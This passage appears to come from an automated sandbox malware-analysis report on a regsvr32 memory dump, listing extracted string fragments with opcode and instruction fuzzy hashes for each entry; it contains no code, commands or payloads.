                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "C$*6TO
                                                  • API String ID: 0-2251823003
                                                  • Opcode ID: 11a52743e991166c772ae58171141d3b918ce8d4020b5bd660e65aa41626bcf5
                                                  • Instruction ID: 1108d3b1afe4df31317b10417d35e55e698c36e02fd161062712c06e930ceb12
                                                  • Opcode Fuzzy Hash: 11a52743e991166c772ae58171141d3b918ce8d4020b5bd660e65aa41626bcf5
                                                  • Instruction Fuzzy Hash: 598166B550130DCFCB98DF28C58A59D3BA8FB49308F40812AFC1E9A264D3B4E659DB46
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: NRx$fc.dll
                                                  • API String ID: 0-4183487180
                                                  • Opcode ID: b4a4ba5d31bb0dbda5b37bf156645da5abce175ef766aa9e7dc128ab78272a52
                                                  • Instruction ID: 7c3eed2061eb3ea8b6bf0d1c70d9a16e0a2e2a77544f255897bb26607a47427d
                                                  • Opcode Fuzzy Hash: b4a4ba5d31bb0dbda5b37bf156645da5abce175ef766aa9e7dc128ab78272a52
                                                  • Instruction Fuzzy Hash: 46416C706197489BD3E5DF28C08679FBAE0FB88745F90A92DF585C32A1CB74C9488B43
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LiD+$?
                                                  • API String ID: 0-3739020763
                                                  • Opcode ID: bc963e11fa834f262c09c021a462739b615030ee8f9d2598156052fa386473db
                                                  • Instruction ID: 2f7d624153028320349e4a0adb7356b45dc1f3746b227896fac10cb383cb0630
                                                  • Opcode Fuzzy Hash: bc963e11fa834f262c09c021a462739b615030ee8f9d2598156052fa386473db
                                                  • Instruction Fuzzy Hash: F35191B590034E8FCB48DF64D48A8DE7FB0FB68398F214619E815A7210D7B496A4CFD5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %&Iv$\o
                                                  • API String ID: 0-2950252169
                                                  • Opcode ID: e3b847a27b1fdf8219116b43965b4243214bd6bbc489cbb0191219741f6e6deb
                                                  • Instruction ID: 7d8516b09fccf329ce1ee45da69bc8f76dfc96f1b67d05b04ebb17f55f6537e3
                                                  • Opcode Fuzzy Hash: e3b847a27b1fdf8219116b43965b4243214bd6bbc489cbb0191219741f6e6deb
                                                  • Instruction Fuzzy Hash: 7041C2B090074E8FCB48DF28C88A4DE7FB1FB68398F514619EC56A7250D7B496A4CBC4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |<$P;
                                                  • API String ID: 0-71676942
                                                  • Opcode ID: d8b30cb9b0bbde5f967eaf6e88493efae150f481542faaeeec2b89fd53c9bf9b
                                                  • Instruction ID: b926ab4478da67f81816527f76e4a4189747c2b1a61b322854fb240660ec53f5
                                                  • Opcode Fuzzy Hash: d8b30cb9b0bbde5f967eaf6e88493efae150f481542faaeeec2b89fd53c9bf9b
                                                  • Instruction Fuzzy Hash: 0F41F4B190078ECFCF48DF68C88A5DE7BB0FB58318F10461DE82AA6250D3B49665CF84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #X$< @
                                                  • API String ID: 0-1734357072
                                                  • Opcode ID: efe0763d8a7a245e8cb996b606fb90cb3ba626e454cc1a7dd4141ea463f73824
                                                  • Instruction ID: 53d5526a666e2e4b0aa3df313d94281727ef5dde582db7952040e92a2ea044da
                                                  • Opcode Fuzzy Hash: efe0763d8a7a245e8cb996b606fb90cb3ba626e454cc1a7dd4141ea463f73824
                                                  • Instruction Fuzzy Hash: E241C3B090078E8FCF48DF68C95A5DE7BB0FB58348F104A1DEC6AA6250D3B49665CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .B$X&x
                                                  • API String ID: 0-2125001607
                                                  • Opcode ID: b56e4be042cf3e20bfd4171d949980e8bdde88a4c8b77932d249eea416ff403a
                                                  • Instruction ID: 406be0e8b3d674fc45ad7aec45ce8f3a41fae9dcbe4fb503a73b8d88e4a7390b
                                                  • Opcode Fuzzy Hash: b56e4be042cf3e20bfd4171d949980e8bdde88a4c8b77932d249eea416ff403a
                                                  • Instruction Fuzzy Hash: F541C3B190034E8BDF48DF68C98A4DE7BB1FB58358F00461DE866AB350D3B89665CF85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: D-o$S1
                                                  • API String ID: 0-2248371139
                                                  • Opcode ID: b2af9136cfd81d84eb1aedf16953768fff15e9d6dc77d4de408be5ef0b131a39
                                                  • Instruction ID: c824313cc5550ea8d08e24e936909b38c1116e4b52b8e35a6cfdfb4e8fb0d5b5
                                                  • Opcode Fuzzy Hash: b2af9136cfd81d84eb1aedf16953768fff15e9d6dc77d4de408be5ef0b131a39
                                                  • Instruction Fuzzy Hash: 7F418F7090074E8FCF88CF68C48A5DEBFB0FB28398F144619E856A6250D3B496A5CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ")v$kNTY
                                                  • API String ID: 0-925696221
                                                  • Opcode ID: 2d468f080be7dc4ac37fbc5ab55ab08a385f91380d02a95960c4866fb202e0cd
                                                  • Instruction ID: 3d1cde25fc61112586e0ccbc864a2b9889115514f3b9559dcc74a8c2fbc402f5
                                                  • Opcode Fuzzy Hash: 2d468f080be7dc4ac37fbc5ab55ab08a385f91380d02a95960c4866fb202e0cd
                                                  • Instruction Fuzzy Hash: 49317CB16187858B8348DF28C45641ABBE1FBCD70CF544B2DF4CAAB251D738D6128B4B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O$\u
                                                  • API String ID: 0-3775190597
                                                  • Opcode ID: 81226de3c00d9588fcdb855554b2562b3d5d50c3db8a2dd8ff0fab91db437570
                                                  • Instruction ID: b3d17dff366e7d439aca65bd494037a1e9e1cb33d0f26cc5f3c7e2fad645fe6e
                                                  • Opcode Fuzzy Hash: 81226de3c00d9588fcdb855554b2562b3d5d50c3db8a2dd8ff0fab91db437570
                                                  • Instruction Fuzzy Hash: 5B31C4B0528781AFC798DF28D09991ABBF1FBC9304F806A1DF98A8B350D774D845CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: +N$:s[
                                                  • API String ID: 0-2992701377
                                                  • Opcode ID: 59945e4bfd5c1812b410bc992af75b99beb9f24da50121ece688e224e72b4b08
                                                  • Instruction ID: 2af45dfac4c7ae0da7497fa8c295952f08e7f96bebb69c710dc1a077a3b8364b
                                                  • Opcode Fuzzy Hash: 59945e4bfd5c1812b410bc992af75b99beb9f24da50121ece688e224e72b4b08
                                                  • Instruction Fuzzy Hash: 443192B5528381ABC388DF28C48A81FBBE1FBC9359F806A1DF8C696261D734D5458B43
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 'yN$k
                                                  • API String ID: 0-35230329
                                                  • Opcode ID: 664b9cbffe37651652d085acf9af43cce7b6a19192dfc0ee1d7ff8525738b321
                                                  • Instruction ID: 07b651401a32326000ca6cd35722393aebb0696fbf8e2d5e5a89f081ef8d3ba1
                                                  • Opcode Fuzzy Hash: 664b9cbffe37651652d085acf9af43cce7b6a19192dfc0ee1d7ff8525738b321
                                                  • Instruction Fuzzy Hash: DE318FB191478E8BDB48DF68D8494DF3BF0FB58308F004A29EC6A9A250D7B49664CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ]2F$lt
                                                  • API String ID: 0-3307743551
                                                  • Opcode ID: e35954fd64214c4dc75024e05a92e9afc61a62ba820b5d5e41e037a5dcd882da
                                                  • Instruction ID: b2e8e3d622355c2c7a8d87ad16832996e77f732c72c2020fcd3ed114b96953d1
                                                  • Opcode Fuzzy Hash: e35954fd64214c4dc75024e05a92e9afc61a62ba820b5d5e41e037a5dcd882da
                                                  • Instruction Fuzzy Hash: BC218C70528385ABC798CF24C1CA94BBBE1FBD4758F906A0DF8828B264D774D909CB43
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: t2i.
                                                  • API String ID: 0-2317288456
                                                  • Opcode ID: ddf1efb97a931d6c5f3ee8c67c3fa2b44aa9af6db9e4e5e1b98fbf81237c32be
                                                  • Instruction ID: 45fd1b4f7d9ae1bb3a1595fd0447dfa3858b4c22850e921c91e36994c5fa5290
                                                  • Opcode Fuzzy Hash: ddf1efb97a931d6c5f3ee8c67c3fa2b44aa9af6db9e4e5e1b98fbf81237c32be
                                                  • Instruction Fuzzy Hash: F4C17C709197489BD7D6DF18C48579EBBE0FB88344F906A1EF486C72A0CB34DA49CB02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !
                                                  • API String ID: 0-133318149
                                                  • Opcode ID: 9a28524a62feba04ad602aea3c6b43a9e37f0bb3cb72c69032c5b680e6eaa856
                                                  • Instruction ID: 4d490125f0736c0523a0bc8c54046deb818a488a36854fcf26dc18eb231edbc7
                                                  • Opcode Fuzzy Hash: 9a28524a62feba04ad602aea3c6b43a9e37f0bb3cb72c69032c5b680e6eaa856
                                                  • Instruction Fuzzy Hash: 94C1277090474D8BDF48DF68C88A6EE7BF1FB48358F15821DE84AA7250C7789949CF85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GP
                                                  • API String ID: 0-809347306
                                                  • Opcode ID: c18687982be6c1a2fdabfac97a268a3404b4fe9754ccd0dba6adaab26aa3d97e
                                                  • Instruction ID: b8cc07b6ee5f07dffcf88ae53723e0b0b514af2364763fc1c4f878c703b2f424
                                                  • Opcode Fuzzy Hash: c18687982be6c1a2fdabfac97a268a3404b4fe9754ccd0dba6adaab26aa3d97e
                                                  • Instruction Fuzzy Hash: 35C18BB190060DCFCF68CF78D55A59D7BF1BB48308F606229F826AA2A2D3B49915CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: G
                                                  • API String ID: 0-4067352199
                                                  • Opcode ID: 571051391216adea76df2afa30ecc8bad161d89b390d9c97388838629c1a5ca4
                                                  • Instruction ID: 225e36911d9d240547ab15c987b60d96220a9315f181ed6db9e7231e26a901aa
                                                  • Opcode Fuzzy Hash: 571051391216adea76df2afa30ecc8bad161d89b390d9c97388838629c1a5ca4
                                                  • Instruction Fuzzy Hash: 54A11871A0460CCFDF59DFA8C44A6DDB7F2FB48344F104529E816BB261CB749909CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :d
                                                  • API String ID: 0-1981401805
                                                  • Opcode ID: 7e01d6742b691afee721fc3f193522d49c245a6ce31efde50cdf5c406c664d98
                                                  • Instruction ID: 210e0c3814bb066ec4f0600647a6f8918949d15d236ac433349e910c02a539df
                                                  • Opcode Fuzzy Hash: 7e01d6742b691afee721fc3f193522d49c245a6ce31efde50cdf5c406c664d98
                                                  • Instruction Fuzzy Hash: 55B1067150560DDFCB88DF28C089ADE7BE0FF58308F825229F80AA7255D774DA98DB49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 'NL
                                                  • API String ID: 0-130891299
                                                  • Opcode ID: 8a3ed407222c8cc95b4195594c73c0a0709bd4276b41a18d313f15a757072ddc
                                                  • Instruction ID: bb2c5b98f4e45d76fdff147334347c6d164a6d6c8cf2b5048c0250209dce3a22
                                                  • Opcode Fuzzy Hash: 8a3ed407222c8cc95b4195594c73c0a0709bd4276b41a18d313f15a757072ddc
                                                  • Instruction Fuzzy Hash: 08816770900748CFDB99CF68C4896DE7BF0FB48394F609129F94697261C774D989CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ETz
                                                  • API String ID: 0-3877082699
                                                  • Opcode ID: a70674ad09814c9e1798ed159b67f00a2b9c82905ce41e3639f5d760caf2f047
                                                  • Instruction ID: db1a2cf02a49f3c5a1febdf95057c2803ba9c7043f43a3a74a84a847f8708688
                                                  • Opcode Fuzzy Hash: a70674ad09814c9e1798ed159b67f00a2b9c82905ce41e3639f5d760caf2f047
                                                  • Instruction Fuzzy Hash: 6281BC34A0674CCBDB65CFA8C0897CDBBF1FF68348F104119E915AA2A6CB70D559CB89
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #;*z
                                                  • API String ID: 0-1682342327
                                                  • Opcode ID: b680f4a085bd44a123493e5971e743dba8c621f53e8aa86b84bd23ce7ca92522
                                                  • Instruction ID: dbf9c55ae058a2f54c24d1eac6a5ff2fe61b468a3017e99be0a6ffbf3af3057b
                                                  • Opcode Fuzzy Hash: b680f4a085bd44a123493e5971e743dba8c621f53e8aa86b84bd23ce7ca92522
                                                  • Instruction Fuzzy Hash: EF91E0715042888FCBB9DF24D88A7DA7BA1FB45348F50C229D88ECE261DFB0564DDB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: )0
                                                  • API String ID: 0-1029681778
                                                  • Opcode ID: 40e7eb8740bf53d50ac0b689975ccfd72f61ab29a6f5010a355cdccaad617979
                                                  • Instruction ID: 121df312e681884aeaf9abe1505228ce9ff72d97cb51e4d07d955d8bff2ee376
                                                  • Opcode Fuzzy Hash: 40e7eb8740bf53d50ac0b689975ccfd72f61ab29a6f5010a355cdccaad617979
                                                  • Instruction Fuzzy Hash: 6851673861660CCBDB69DF78D4852E93BE0FF69344F20402DFC6687266DB34D52A8B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Uerm
                                                  • API String ID: 0-3179360214
                                                  • Opcode ID: 9ac54ab8c90a486f4441a78f79c66deafdf79af98abc137c17ed1b11debabc8b
                                                  • Instruction ID: 041d59295089493447bb19a8378e04636211af5195b78f50b28b80e802418f55
                                                  • Opcode Fuzzy Hash: 9ac54ab8c90a486f4441a78f79c66deafdf79af98abc137c17ed1b11debabc8b
                                                  • Instruction Fuzzy Hash: AD6103B190061A8FCF48DFA8C48A5EEBBB1FB58344F10822DE815AB365C7749A55CFD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: n?,#
                                                  • API String ID: 0-1323099997
                                                  • Opcode ID: 26b976f19a01f89e53d4e797cc3bc9c5337180b5ac8f28c70c7e0350769e597c
                                                  • Instruction ID: 565b854ac311e8ede55e0f860d8d3b50ebc6ea35409b62ec986654d35b43713b
                                                  • Opcode Fuzzy Hash: 26b976f19a01f89e53d4e797cc3bc9c5337180b5ac8f28c70c7e0350769e597c
                                                  • Instruction Fuzzy Hash: 4461F97054878DCBEBBADE38C8897D937B0FB48344F908529E94E8E290DB749A458B45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: {dN
                                                  • API String ID: 0-923835543
                                                  • Opcode ID: 9e75a9b6c969771d2fbed292b07595da2e1a6dc424cdc2e689696f47c6000392
                                                  • Instruction ID: f9e1d774cd1a5aafce577d99eb21246fb33c51757267e19de4f8e3655d4c3e4d
                                                  • Opcode Fuzzy Hash: 9e75a9b6c969771d2fbed292b07595da2e1a6dc424cdc2e689696f47c6000392
                                                  • Instruction Fuzzy Hash: A24118B091470D8BCF48DFA8C58A1DEBFB1FB483A8F25521DE90AB6250C7749585CF88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: hT
                                                  • API String ID: 0-434349927
                                                  • Opcode ID: 6dc475388242e87dfd02804309664708b9ba0169bf98e34e56dbb37a95c1b731
                                                  • Instruction ID: 79a86a43dda6c0bf54cad5f70c675ce2074b99fb8c760d3b3e2f6daa19ea02a9
                                                  • Opcode Fuzzy Hash: 6dc475388242e87dfd02804309664708b9ba0169bf98e34e56dbb37a95c1b731
                                                  • Instruction Fuzzy Hash: 2A5190B190038E8BCB48DF68C88A5DE7BB0FB58308F104A19FC65A6250D7B4D669CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: w.
                                                  • API String ID: 0-4252102657
                                                  • Opcode ID: 775cc355a8dd2b6f1bc8d8548c4489e17c5a54c9aeae587b6d573d3d7a9b0f7e
                                                  • Instruction ID: ff83c9861e3aef96e788ade2e95c5d31a765335f039db5447ff320373d52f62b
                                                  • Opcode Fuzzy Hash: 775cc355a8dd2b6f1bc8d8548c4489e17c5a54c9aeae587b6d573d3d7a9b0f7e
                                                  • Instruction Fuzzy Hash: 524127B190434A8BCF48DF64C88A4DE7FB1FB58348F10861DEC5AA7250D7749659CBC4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \>
                                                  • API String ID: 0-4115654482
                                                  • Opcode ID: ec85be460c7c8dfb7cf3a46c57a1e14dcdd929cba8cf803056f6d038e5aaf727
                                                  • Instruction ID: c8bfe62f06df19f0db5cc8e5fd5c20be0a97c60a2c34a345c5b0509f61aa275d
                                                  • Opcode Fuzzy Hash: ec85be460c7c8dfb7cf3a46c57a1e14dcdd929cba8cf803056f6d038e5aaf727
                                                  • Instruction Fuzzy Hash: 5041B0B490038E8FDB48DF65D8895DE7BB0FB48358F104A1AEC25A6250D7B4D664CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: UfMm
                                                  • API String ID: 0-3877223347
                                                  • Opcode ID: dec106b4a764423c6080cde6e3c380fc2c4206b9dd3c84e9483206ca750e3b76
                                                  • Instruction ID: c77ef5b6f515275834e01b5fcfcfc22ffe1a93dbca634ff8363d49e0f941db2a
                                                  • Opcode Fuzzy Hash: dec106b4a764423c6080cde6e3c380fc2c4206b9dd3c84e9483206ca750e3b76
                                                  • Instruction Fuzzy Hash: A1519EB190474E8BCF49CF64C48A5DE7FB0FB68398F214219E85A96250D3B8D6A4CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ^I%
                                                  • API String ID: 0-4091345571
                                                  • Opcode ID: 3f12ff418f07ff0dffb22bdd7eb3939b0fd24fdb2c19c7287af7d17ae91e7243
                                                  • Instruction ID: 24279a7f0b8a810ed47d94a020ccddcda864278dcc3d62ea9a1aafd37f1cc870
                                                  • Opcode Fuzzy Hash: 3f12ff418f07ff0dffb22bdd7eb3939b0fd24fdb2c19c7287af7d17ae91e7243
                                                  • Instruction Fuzzy Hash: D641C2B090074E8BCB48DF68C58A4DE7FF0FB68398F204219EC16A6250D3B496A4CFD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E
                                                  • API String ID: 0-4189953480
                                                  • Opcode ID: 6b2582ab6db5c886dc2d719d00820c997d2b994a7b2935478f04cfa12a5363ce
                                                  • Instruction ID: 97bb68eb89739962e45bd832e2874dcd633b22f5609a7b84b761109d701c7c23
                                                  • Opcode Fuzzy Hash: 6b2582ab6db5c886dc2d719d00820c997d2b994a7b2935478f04cfa12a5363ce
                                                  • Instruction Fuzzy Hash: B341D5B491038E8FCF88DF69D8495DE7BB0FB18358F104A19EC2AA6250D3B49664CF85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
